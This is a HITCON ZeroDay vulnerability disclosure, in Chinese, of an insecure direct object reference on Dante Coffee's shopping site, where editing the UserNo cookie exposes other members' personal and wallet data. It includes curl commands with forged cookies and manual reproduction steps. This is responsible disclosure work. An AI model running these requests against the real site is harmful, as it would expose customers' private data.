丹堤咖啡 個資易讀取 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2023-00408
  •  發信 Vendor: 丹堤咖啡食品股份有限公司
  • Title: 丹堤咖啡 個資易讀取
  • Introduction: 有個 API 可以獲取用戶個資,此 API 易被瓊舉、猜測

處理狀態

目前狀態

公開
Last Update : 2023/12/08
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2023/08/05 14:47:40 : 新提交 (由 user 更新此狀態)
  • 2023/08/08 06:05:33 : 新提交 (由 user 更新此狀態)
  • 2023/08/12 11:15:15 : 新提交 (由 user 更新此狀態)
  • 2023/08/12 12:20:22 : 新提交 (由 user 更新此狀態)
  • 2023/08/12 12:25:05 : 新提交 (由 user 更新此狀態)
  • 2023/08/14 09:51:11 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2023/08/14 15:38:18 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2023/08/14 15:38:18 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2023/08/14 15:38:18 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2023/10/05 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2023/11/30 15:10:55 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2023/12/08 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2023-00408
  • 通報者:user (user)
  • 風險:中
  • 類型:其他 (Other)

參考資料

暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://shop.dante.com.tw/

敘述

丹提咖啡行動購物網的會員中心頁面存在弱點,後端程式是根據使用著發出請求時夾帶在請求的 Cookie 判斷回傳資料,該 Cookie 名為 UserNo 內容是使用著的編號並存放於瀏覽器內,若有有心人士經修改 Cookie 中的 UserNo 即可獲取他人的個資、送禮紀錄及錢包資訊...等機敏內容,故建議丹提咖啡儘速修補此弱點,謝謝。

下方為弱點可被利用範例

$ curl -s --cookie "UserNo=編號一; VldCode=0;" "https://shop.dante.com.tw/VipInfo.aspx" | grep 'name="ctl00$cph_Main$txtVIPNa"'
                    <input name="ctl00$cph_Main$txtVIPNa" type="text" value="A                        " id="cph_Main_txtVIPNa" />
$ curl -s --cookie "UserNo=編號二; VldCode=0;" "https://shop.dante.com.tw/VipInfo.aspx" | grep 'name="ctl00$cph_Main$txtVIPNa"'
                    <input name="ctl00$cph_Main$txtVIPNa" type="text" value="B                        " id="cph_Main_txtVIPNa" />
$ curl -s --cookie "UserNo=編號三; VldCode=0;" "https://shop.dante.com.tw/VipInfo.aspx" | grep 'name="ctl00$cph_Main$txtVIPNa"'
                    <input name="ctl00$cph_Main$txtVIPNa" type="text" value="C                        " id="cph_Main_txtVIPNa" />
$ curl -s --cookie "UserNo=編號四; VldCode=0;" "https://shop.dante.com.tw/VipInfo.aspx" | grep 'name="ctl00$cph_Main$txtVIPNa"'
                    <input name="ctl00$cph_Main$txtVIPNa" type="text" value="D                         " id="cph_Main_txtVIPNa" />
$ curl -s --cookie "UserNo=編號五; VldCode=0;" "https://shop.dante.com.tw/VipInfo.aspx" | grep 'name="ctl00$cph_Main$txtVIPNa"'
                    <input name="ctl00$cph_Main$txtVIPNa" type="text" value="E                         " id="cph_Main_txtVIPNa" />

操作流程:

  1. 建立兩組測試帳號,信箱結尾分別是 "... [email protected]" 及 "... [email protected]",對應的姓名分別為 "dante-1" 及 "dante-2"。

  2. 通過正常輸入帳號及密碼的方式登入

  3. 在瀏覽器的開發人員工具的 Cookie 設定中即可查看該帳號的 UserNo,姓名為 "dante-1" 帳號的 UserNo 最後兩位數是 "09",姓名為 "dante-2" 帳號的 UserNo 最後兩位數是 "10"

  4. 以第一個帳號的信箱 "... [email protected]" 及密碼正常登入

  5. 打開丹提咖啡的會員中心,網址為 https://shop.dante.com.tw/VipInfo.aspx ,可以看到姓名是 "dante-1"

  6. 進入瀏覽器開發人員工具的 Cookie 設定,原本 UserNo 會是以 "09" 結尾,接著將 UserNo 的結尾修改成 "10"

  7. 重新訪問丹提開發會員中心 https://shop.dante.com.tw/VipInfo.aspx ,可以看到姓名是 "dante-2"

附上操作流程的螢幕錄影 https://ody.sh/LiQ65QSsTq

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;